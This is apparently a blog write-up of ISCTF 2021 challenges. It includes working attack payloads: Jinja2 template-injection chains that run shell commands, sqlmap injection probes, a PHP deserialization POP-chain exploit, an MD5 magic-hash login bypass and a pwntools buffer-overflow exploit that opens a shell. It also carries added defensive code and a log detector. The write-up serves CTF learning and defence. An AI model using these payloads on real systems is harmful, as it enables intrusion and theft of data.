        echo "<h1>"."Login failed"."<p>"."The blue shark mocked you and threw a hint at you"."<p>";
        highlight_file(__FILE__);
    }
}
?>

MD5 collision bypass:

POST: username=QNKCDZO&password=240610708


ISCTF{pHP_1s_ThE_6eST_1@n9V@Ge}

New flag:
ISCTF{acde1b6f-085d-4c5d-91f3-07ce8ff4ee95}
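
Why that username/password pair passes, as an added Python example (not part of the original write-up): both MD5 digests have the form 0e followed only by digits, so PHP's loose `!=` reads them as numeric strings equal to zero, while an exact string comparison (`!==` or `hash_equals()` in PHP) rejects the pair. `php_loose_equal` is this example's approximation of PHP's `==` on two strings, and all function names are its own.

```python
# Added example: loose vs. strict comparison of the two MD5 digests from the page.
import hashlib
import hmac
import re

# Shape of a PHP "numeric string": optional sign, decimal digits, optional exponent.
_NUMERIC = re.compile(r"\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*\Z")


def is_numeric(s):
    """Approximation of PHP's is_numeric() for strings."""
    return _NUMERIC.match(s) is not None


def php_loose_equal(a, b):
    """PHP's ==: two numeric strings are compared as numbers, anything else as text."""
    if is_numeric(a) and is_numeric(b):
        return float(a) == float(b)  # "0e123" and "0e456" are both 0.0
    return a == b


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def precheck(name, pwd):
    """The ctype_alpha() / is_numeric() gates from the challenge source."""
    return name.isascii() and name.isalpha() and is_numeric(pwd)


def login_loose(name, pwd):
    """Mirrors the page's check: md5($name) != md5($pwd) with loose comparison."""
    return precheck(name, pwd) and php_loose_equal(md5_hex(name), md5_hex(pwd))


def login_strict(name, pwd):
    """Same gates, but the digests are compared as exact strings."""
    return precheck(name, pwd) and hmac.compare_digest(md5_hex(name), md5_hex(pwd))


if __name__ == "__main__":
    for name, pwd in [("QNKCDZO", "240610708"), ("admin", "123456")]:
        print(name, md5_hex(name), pwd, md5_hex(pwd),
              "loose:", login_loose(name, pwd), "strict:", login_strict(name, pwd))
```
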

Little Spider

Author: 啊罗小黑战记停更了

School: Jiaozuo University

Challenge description: Boys and girls, do you like little spiders? http://isctf.mcsog.tk:10002/

/robot.txt
/flag_is_here.php
ISCTF{g9kov44avqh5kjkes8d990t1y}


New flag:
ISCTF{ba2f7fa0-0727-4739-b883-ac609a0e5258}

pop_unserialize

Author: 种花家

School: Leshan Vocational and Technical College

http://isctf.mcsog.tk:10003/unserialize.php

<?php
//flag.php
// Master MF told me that the file_get_contents function can output the contents of flag.php

class MF_is_cat{
    private $pop = "f00001111";
    public $MF = "miao~ miao~ miao~";
    function __construct(){
        $this->pop =new ISCTF();
    }

    function __destruct(){
        $this->pop->action();
    }
}

class ISCTF{
    function action(){
        echo "Welcome to ISCTF World!";
    }
}

class Show{
    var $test2;
    function action(){
        echo file_get_contents($this->test2);
    }
}


if(isset($_POST['ISCTF'])){
    unserialize($_POST['ISCTF']);
}else{
    $obj = new MF_is_cat();
    highlight_file(__FILE__);
}
?> Welcome to ISCTF World!

exp

<?php
//flag.php
// Master MF told me that the file_get_contents function can output the contents of flag.php

class MF_is_cat{
    public $pop = "f00001111";
    public $MF = "miao~ miao~ miao~";
    function __construct(){
        $this->pop =new Show();
    }

    function __destruct(){
        $this->pop->action();
    }
}

class ISCTF{
    function action(){
        echo "Welcome to ISCTF World!";
    }
}

class Show{
    var $test2='flag.php';
    function action(){
        echo file_get_contents($this->test2);
    }
}


$m=new MF_is_cat();

$a= serialize($m);
echo $a;
?>


POST:
ISCTF=O:9:"MF_is_cat":2:{s:3:"pop";O:4:"Show":1:{s:5:"test2";s:8:"flag.php";}s:2:"MF";s:17:"miao~ miao~ miao~";}
O:9:"MF_is_cat":2:{s:3:"pop";O:4:"Show":1:{s:5:"test2";s:2:"la";}s:2:"MF";s:17:"miao~ miao~ miao~";}


ISCTF{MF_YYDS}

New flag:
ISCTF{ea2b37f4-ec87-4587-b11d-e55987dcb325}

Intended solution

<?php
//flag.php
// Master MF told me that the file_get_contents function can output the contents of flag.php

class MF_is_cat{
    public $pop;
    public $MF ;
    function __construct(){
        $this->pop =new ISCTF();
    }

    function __destruct(){
        $this->pop->action();
    }
}
class ISCTF{
    function action(){
        echo "Welcome to ISCTF World!";
    }
}
class Show{
    var $test2='la';
    function action(){
        echo file_get_contents('f'.$this->test2.'g.php');
    }
}
$exp=new MF_is_cat();
$exp->pop=new Show();
echo serialize($exp);

?>

Jigsaw Puzzle

Looking at the source, the JS is full of Base64-encoded strings, so write a script to run through them:

# coding: UTF-8
import base64

encoded = [
    'dW1hc2s=', 'YW1k', 'VnVlUm91dGVy', 'Y2xhc3NDYWxsQ2hlY2s=',
    # ..... (the rest of the list is elided in the original)
    'Y3dk', 'Y2hkaXI=', 'cHJvY2Vzcy5jaGRpciBpcyBub3Qgc3VwcG9ydGVk',
]
for i in encoded:
    m = base64.b64decode(i)
    if "ISCTF" in str(m):
        print(m)

b'You Win! This is your flag: ISCTF{p1e2se_G4ME_n00ds_Gre4t_M!nd!}'


flag:ISCTF{p1e2se_G4ME_n00ds_Gre4t_M!nd!}

easy flask

hint: try the /wow directory, and consider the malicious code injection caused by not rendering a template file. The parameter is id.

Payload:/wow/?id={{[].__class__.__base__.__subclasses__()}}
#[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'dict_reversekeyiterator'>, <class 'dict_reversevalueiterator'>, <class 'dict_reverseitemiterator'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>, <class 'instancemethod'>, <class 'classmethod_descriptor'>, <class 'method_descriptor'>, <class 'callable_iterator'>, <class 'iterator'>, <class 'pickle.PickleBuffer'>, <class 'coroutine'>, <class 'coroutine_wrapper'>, <class 'InterpreterID'>, <class 'EncodingMap'>, <class 'fieldnameiterator'>, <class 'formatteriterator'>, <class 'BaseException'>, <class 'hamt'>, <class 'hamt_array_node'>, <class 'hamt_bitmap_node'>, <class 'hamt_collision_node'>, <class 'keys'>, <class 'values'>, <class 'items'>, <class 'Context'>, <class 'ContextVar'>, <class 'Token'>, <class 'Token.MISSING'>, <class 'moduledef'>, <class 'module'>, <class 'filter'>, <class 'map'>, <class 'zip'>, <class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class 
'_frozen_importlib.BuiltinImporter'>, <class 'classmethod'>, <class '_frozen_importlib.FrozenImporter'>, <class '_frozen_importlib._ImportLockContext'>, <class '_thread._localdummy'>, <class '_thread._local'>, <class '_thread.lock'>, <class '_thread.RLock'>, <class '_frozen_importlib_external.WindowsRegistryFinder'>, <class '_frozen_importlib_external._LoaderBasics'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.PathFinder'>, <class '_frozen_importlib_external.FileFinder'>, <class '_io._IOBase'>, <class '_io._BytesIOBuffer'>, <class '_io.IncrementalNewlineDecoder'>, <class 'posix.ScandirIterator'>, <class 'posix.DirEntry'>, <class 'zipimport.zipimporter'>, <class 'zipimport._ZipImportResourceReader'>, <class 'codecs.Codec'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class '_abc_data'>, <class 'abc.ABC'>, <class 'dict_itemiterator'>, <class 'collections.abc.Hashable'>, <class 'collections.abc.Awaitable'>, <class 'collections.abc.AsyncIterable'>, <class 'async_generator'>, <class 'collections.abc.Iterable'>, <class 'bytes_iterator'>, <class 'bytearray_iterator'>, <class 'dict_keyiterator'>, <class 'dict_valueiterator'>, <class 'list_iterator'>, <class 'list_reverseiterator'>, <class 'range_iterator'>, <class 'set_iterator'>, <class 'str_iterator'>, <class 'tuple_iterator'>, <class 'collections.abc.Sized'>, <class 'collections.abc.Container'>, <class 'collections.abc.Callable'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class '_sitebuiltins._Helper'>, <class 'types.DynamicClassAttribute'>, <class 'types._GeneratorWrapper'>, <class 'enum.auto'>, <enum 'Enum'>, <class 're.Pattern'>, <class 're.Match'>, <class '_sre.SRE_Scanner'>, <class 'sre_parse.State'>, <class 


Payload:/wow/?id={{''.__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['popen']('ls').read()}}
#_pycache__ app.py config.py templates venv

Payload:/wow/?id={{''.__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['popen']('cat config.py').read()}}
#from datetime import timedelta class Config(object): DEBUG = True TESTING = False SECRET_KEY = "ISCTF{weLc0me_T22_Ssti1ll}" Flag = 'ISCTF{qwdwegegerg}' class DevelopmentConfig(Config): DEBUG = True class TestingConfig(Config): TESTING = True class FlagConfig(Config): Flag='ISCTF{fake_flag}' config = { 'development': DevelopmentConfig, 'default': DevelopmentConfig, 'flag' : FlagConfig }



flag:ISCTF{weLc0me_T22_Ssti1ll}

Looking at other people's writeups, I found that requesting /wow/?id= directly also seems to work.

easysql

sqlmap solves it in one go.

┌──(kali㉿kali)-[~/桌面]
└─$ sqlmap -r post.txt -D users -T flag -C flag --dump
___
__H__
___ ___[']_____ ___ ___ {1.5.7#stable}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:40:51 /2021-10-21/

[22:40:51] [INFO] parsing HTTP request from 'post.txt'
[22:40:52] [INFO] resuming back-end DBMS 'mysql'
[22:40:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (GET)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: username=admin' AND GTID_SUBSET(CONCAT(0x71786b7871,(SELECT (ELT(8845=8845,1))),0x717a6b6b71),8845)-- kRvQ&password=123

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 2550 FROM (SELECT(SLEEP(5)))ySHy)-- rsWg&password=123

Parameter: password (GET)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: username=admin&password=123' AND GTID_SUBSET(CONCAT(0x71786b7871,(SELECT (ELT(5555=5555,1))),0x717a6b6b71),5555)-- KeQK

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin&password=123' AND (SELECT 2329 FROM (SELECT(SLEEP(5)))VyYl)-- yARH
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: username, type: Single quoted string (default)
[1] place: GET, parameter: password, type: Single quoted string
[q] Quit
> 1
[22:40:53] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 7.3.4
back-end DBMS: MySQL >= 5.6
[22:40:53] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'users'
[22:40:54] [INFO] retrieved: 'ISCTF{ThiS_Is_easy_Sql_sqlMap_yyds}'
Database: users
Table: flag
[1 entry]
+-------------------------------------+
| flag |
+-------------------------------------+
| ISCTF{ThiS_Is_easy_Sql_sqlMap_yyds} |
+-------------------------------------+



flag:ISCTF{ThiS_Is_easy_Sql_sqlMap_yyds}
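
The two web payloads above (the Jinja2 `__subclasses__` chain sent to /wow/?id= and sqlmap's GTID_SUBSET / SLEEP probes against username and password) leave recognisable traces in request logs. The following detector is an added example, not part of the original writeup; the log format, the /login.php and /search paths, the client addresses and the rule names are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines (combined-log style). /login.php, /search and the
# client addresses are assumptions; the payloads are the ones shown in this writeup.
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Oct/2021:22:40:52 +0800] "GET /login.php?username=admin&password=123 HTTP/1.1" 200 512',
    '198.51.100.7 - - [21/Oct/2021:22:40:53 +0800] "GET /login.php?username=admin%27%20AND%20GTID_SUBSET(CONCAT(0x71786b7871,(SELECT%20(ELT(8845=8845,1))),0x717a6b6b71),8845)--%20kRvQ&password=123 HTTP/1.1" 200 640',
    # The time-based probe percent-encoded twice; one decode pass still leaves %27 and %20 in it.
    '198.51.100.7 - - [21/Oct/2021:22:40:54 +0800] "GET /login.php?username=admin&password=123%2527%2520AND%2520(SELECT%25202329%2520FROM%2520(SELECT(SLEEP(5)))VyYl)--%2520yARH HTTP/1.1" 200 640',
    '203.0.113.9 - - [21/Oct/2021:22:41:10 +0800] "GET /wow/?id=%7B%7B%27%27.__class__.__mro__%5B1%5D.__subclasses__()%5B132%5D.__init__.__globals__%5B%27popen%27%5D(%27ls%27).read()%7D%7D HTTP/1.1" 200 97',
    # Benign request that merely contains the words "sleep", "and", "class".
    '192.0.2.44 - - [21/Oct/2021:22:41:30 +0800] "GET /search?q=sleep+schedule+and+class+notes HTTP/1.1" 200 2048',
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Rule names are hypothetical labels chosen for this example.
RULES = {
    "jinja2-object-traversal": re.compile(r"__(class|mro|subclasses|globals|init|builtins)__"),
    "template-expression": re.compile(r"\{\{.*\}\}|\{%.*%\}", re.S),
    "sqli-error-gtid_subset": re.compile(r"\bGTID_SUBSET\s*\(", re.I),
    "sqli-time-sleep": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "sqli-quote-break": re.compile(r"'\s*(AND|OR)\b", re.I),
}


def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing (bounded number of rounds)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line):
    """Return one finding per query parameter that matches at least one rule."""
    m = LOG_RE.match(line)
    if not m:
        return []
    client, _method, target, _status = m.groups()
    url = urlsplit(target)
    findings = []
    for name, once_decoded in parse_qsl(url.query, keep_blank_values=True):
        value = fully_decode(once_decoded)
        hits = sorted(rule for rule, rx in RULES.items() if rx.search(value))
        if hits:
            findings.append({"client": client, "path": url.path,
                             "param": name, "rules": hits})
    return findings


def scan(lines):
    return [finding for line in lines for finding in scan_line(line)]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Matching on decoded parameter values rather than the raw request line is what lets the double-encoded probe and the plain one produce the same finding, while the benign /search request stays clean.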

PWN

Brother Jie's nc

nc 123.57.253.184 10010

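#include <stdio.h>
#include <stdlib.h>

int main(){
    char cmd[100];
    scanf("%s",&cmd);   // reads one word from stdin with no length limit
    system(cmd);        // and hands it straight to the shell
    return 0;
}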

getflag

┌──(kali㉿kali)-[~/桌面]
└─$ nc 123.57.253.184 10010
/bin/sh
ls
bin
dev
flag.txt
lib
lib32
lib64
nc
cat flag.txt
ISCTF{Looks_your_nc_works_we11}

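Save the Little Fat Shark

Author: deoplljj

School: Fujian Normal University

Challenge description: The little fat shark is stuck because of a system's password and needs to obtain administrative privileges on the system. Can you help it?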

nc 123.57.253.184 10001

int __cdecl func(int a1)
{
  int result; // eax
  char s[36]; // [esp+0h] [ebp-28h] BYREF

  printf("help me : ");
  gets(s);
  if ( a1 == -1091784722 )
    result = system("/bin/sh");
  else
    result = puts("Oh,no");
  return result;
}

exp

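from pwn import *

# p = process("./help_my_shark")   # local test
p = remote("123.57.253.184", 10001)
addr = 0xBEECAFEE                   # -1091784722 as an unsigned 32-bit value
# 0x28 bytes fill s up to ebp, 4 bytes cover the saved ebp, p32(0) covers the
# return address, and the next dword is a1
payload = b"B"*0x28 + b"B"*4 + p32(0) + p32(addr)
p.sendline(payload)
p.interactive()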

Result

┌──(kali㉿kali)-[~/桌面]
└─$ python3 1.py
[+] Opening connection to 123.57.253.184 on port 10001: Done
[*] Switching to interactive mode
____ ____ _____ ______ ____
/ _// __// ___//_ __// __/
_/ / _\ \ / /__ / / / _/
/___//___/ \___/ /_/ /_/
Sponsored by http://www.bluesharkinfo.com/



help me : $ ls
bin
dev
flag.txt
help_my_shark
lib
lib32
lib64
$ cat flag.txt
ISCTF{Xiao_fei_sha_send_a_like_to_YoU}

RE

Simple Re

Open it in IDA and press Shift+F12.

flag

ISCTF{debugdebugdebug_@}

RE Check-in

Packer-detection tool: https://www.52pojie.cn/thread-437586-1-1.html
Unpacking tool: https://github.com/upx/upx/releases

UPX

Open the file in 010 Editor and replace every RPX with UPX.

Then unpack it with upx.

Open it in IDA and view the pseudocode.

Code logic: each character of the input string s is XORed with 10, then 2 is added, and the resulting string is compared with the array a[j].

Here a = "E[K`Ns;5mpp:5?4jnAj@5Ay".

exp:

list_a = []
a = "E[K`Ns;5mpp:5?4jnAj@5Ay"
for i in a:
    list_a.append(ord(i))
print(list_a)

flag = ""

# Invert the check: subtract 2, then XOR with 10
for i in range(0, len(a)):
    flag += chr((list_a[i]-2)^10)
print(flag)

#ISCTF{39add2978bf5b495}

Reverse-Easy_JAR

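Author: 李黑子

School: Zhoukou Vocational and Technical College

Challenge description: an encoding and an encryption

1. Go into the folder; the file cannot be opened normally and has to be opened from the cmd command line:

2. It is a jar file; open it with jd_gui:

3. Look at the code that encrypts NBEKABsLBisvMDcyJUZWUUU=:

With the code in hand, write a script: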

import base64

m = base64.b64decode('NBEKABsLBisvMDcyJUZWUUU=')
k = b'ctf'
flag = ""
# XOR each decoded byte with the repeating key "ctf"
for i in range(len(m)):
    flag += chr(m[i]^k[i%3])
print("ISCTF{"+flag+"}")

#ISCTF{Welcome_ISCTF2021}

Android

Guess the Number

Decompile the APK.

Concatenate the flag parts in order.

ISCTF{5ec07215-716f-498a-85ad-5f39322f707b}

Screen-Locker Virus

The password is six digits. Change the extension to zip, extract liblock.so, open it in IDA, and search for the main function.

The password is 173572

ISCTF{b3d3b0eO-ccfd-4d7b-be78-0ab81da3d334}

Coding

KNN

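Author: Marcher

School: Dali University

Challenge description: a simple algorithm

Wrap the result in ISCTF{} before submitting.

KNN was a first-year Python lab project: a machine-learning algorithm used to classify data. I dug out the fruit-classification script I wrote back then to adapt it.

It was unusable: the fruit data is three-dimensional, so this challenge needs a rewritten script. I went straight to CSDN for code:

https://blog.csdn.net/weixin_30846599/article/details/97486168

https://blog.csdn.net/cqulun123/article/details/80217558

Modify its test/training-set code: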

import operator
from numpy import array, tile

def createdataset():
    group = array([
        [0, 0],[0, 0.5],[0, 1],
        [1.0, 1.1], [1.0, 1.5],[1.0, 2.0],
        [2.0,2.0],[2.0,2.5],[2.0,3.0],
        [3.0,3.0],[3.0,3.5],[3.0,4.0],
        [4.0,4.0],[4.0,4.5],[4.0,5.0],
        [5.0,5.0],[5.0,5.5],[5.0,6.0],
        [6.0,6.0],[6.0,6.5],[6.0,7.0],
        [7.0,7.0],[7.0,7.5],[7.0,8.0],
        [8.0,8.0],[8.0,8.5],[8.0,9.0],
        [9.0,9.0],[9.0,9.5],[9.0,10.0],
        [10.0,10.0],[10.0,10.5],[10.0,11.0],
        [11.0,11.0],[11.0,11.5],[11.0,12.0],
        [12.0,12.0],[12.0,12.5],[12.0,13.0],
        [13.0,13.0],[13.0,13.5],[13.0,14.0],
        [14.0,14.0],[14.0,14.5],[14.0,15.0],
        [15.0,15.0],[15.0,15.5],[15.0,16.0],
        [16.0,16.0],[16.0,16.5],[16.0,17.0],
        [17.0,17.0],[17.0,17.5],[17.0,18.0],
        [18.0,18.0],[18.0,18.5],[18.0,19.0],
        [19.0,19.0],[19.0,19.5],[19.0,20.0],
        [20.0,20.0],[20.0,20.5],[20.0,21.0],
        [21.0,21.0],[21.0,21.5],[21.0,22.0],
        [22.0,22.0]])
    labels = ['A', 'a', 'B', 'b', 'C', 'c', 'D', 'd', 'E', 'e', 'F', 'f', 'G', 'g', 'H', 'h', 'I', 'i', 'J', 'j', 'K', 'k', 'L', 'l', 'M', 'm', 'N', 'n', 'O', 'o', 'P', 'p', 'Q', 'q', 'R', 'r', 'S', 's', 'T', 't', 'U', 'u', 'V', 'v', 'W', 'w', 'X', 'x', 'Y', 'y', 'Z', 'z','@','!','_','%','~','1','2','3','4','5','6','7','8','9','0']
    return group, labels

def KNN_run(inx, data_set, labels, k):
    data_set_size = data_set.shape[0]
    # Euclidean distance from inx to every training point
    diff_mat = tile(inx, (data_set_size, 1)) - data_set
    sq_diff_mat = diff_mat**2
    sq_distances = sq_diff_mat.sum(axis=1)
    distances = sq_distances**0.5
    sorted_dist_indices = distances.argsort()
    class_count = {}

    # Majority vote among the k nearest neighbours
    for i in range(k):
        vote_label = labels[sorted_dist_indices[i]]
        class_count[vote_label] = class_count.get(vote_label, 0) + 1
    sorted_class_count = sorted(class_count.items(),
                                key=operator.itemgetter(1), reverse=True)
    return sorted_class_count[0][0]

#data=[[20,13],[9,5],[47,73],[11,54],[36,34],[90,60],[69,26],[69,59],[8,75],[44,18],[18,90],[68,71],[37,88],[16,21],[58,9],[96,77],[35,54],[23,33],[97,77],[76,47],[67,16],[28,13],[1,93],[45,12],[66,87],[15,74],[28,39],[99,1],[82,17],[99,42],[17,46],[75,21],[42,24],[97,15],[60,27],[60,35],[70,75],[18,89],[65,74],[73,30],[47,13],[93,39],[25,63]]
#K=5
if __name__ == '__main__':
    group, labels = createdataset()
    data = [[20,13],[9,5],[47,73],[11,54],[36,34],[90,60],[69,26],[69,59],[8,75],[44,18],[18,90],[68,71],[37,88],[16,21],[58,9],[96,77],[35,54],[23,33],[97,77],[76,47],[67,16],[28,13],[1,93],[45,12],[66,87],[15,74],[28,39],[99,1],[82,17],[99,42],[17,46],[75,21],[42,24],[97,15],[60,27],[60,35],[70,75],[18,89],[65,74],[73,30],[47,13],[93,39],[25,63]]
    for i in data:
        test_class = KNN_run(i, group, labels, 5)
        print(test_class, end="")

flag:ISCTF{zk09000090900~00000007900900009000000900000}

Questionnaire

ISCTF{Thank_U_4_Participating_ISCTF2021_AnD_C_U_Next_Ye@r}

Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 4.0. Please credit the source when reposting!